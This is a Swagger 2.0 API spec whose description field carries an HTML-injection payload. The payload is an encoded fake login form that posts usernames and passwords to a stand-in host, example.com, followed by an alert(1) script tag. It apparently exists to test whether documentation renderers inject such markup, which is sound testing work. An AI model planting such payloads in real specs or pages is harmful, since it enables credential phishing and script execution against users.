swagger: '2.0'
info:
  version: 1.0.0
  title: Fake Login Page
  description: |
    &lt;div class=&quot;login-form&quot;&gt;
      &lt;div class=&quot;heading&quot;&gt;
        &lt;h1&gt;HTML Injection : Fake Login&lt;/h1&gt;
      &lt;/div&gt;
      &lt;div class=&quot;form-container&quot;&gt;
        &lt;form action=&quot;https://example.com/login&quot; method=&quot;post&quot; class=&quot;form-signin&quot;&gt;
          &lt;div class=&quot;form-group&quot;&gt;
            &lt;label for=&quot;username&quot;&gt;Username&lt;/label&gt;
            &lt;input type=&quot;text&quot; name=&quot;username&quot; size=&quot;20&quot;&gt;
          &lt;/div&gt;
          &lt;div class=&quot;form-group&quot;&gt;
            &lt;label for=&quot;password&quot;&gt;Password&lt;/label&gt;
            &lt;input type=&quot;password&quot; name=&quot;password&quot; size=&quot;20&quot;&gt;
          &lt;/div&gt;
          &lt;div class=&quot;form-group&quot;&gt;
            &lt;button type=&quot;submit&quot; class=&quot;btn btn-default&quot;&gt;Login&lt;/button&gt;
          &lt;/div&gt;
        &lt;/form&gt;
      &lt;/div&gt;
    &lt;/div&gt;
    &lt;script&gt;alert(1)&lt;/script&gt;
paths:
  /:
    post:
      responses:
        '200':
          description: Login successful
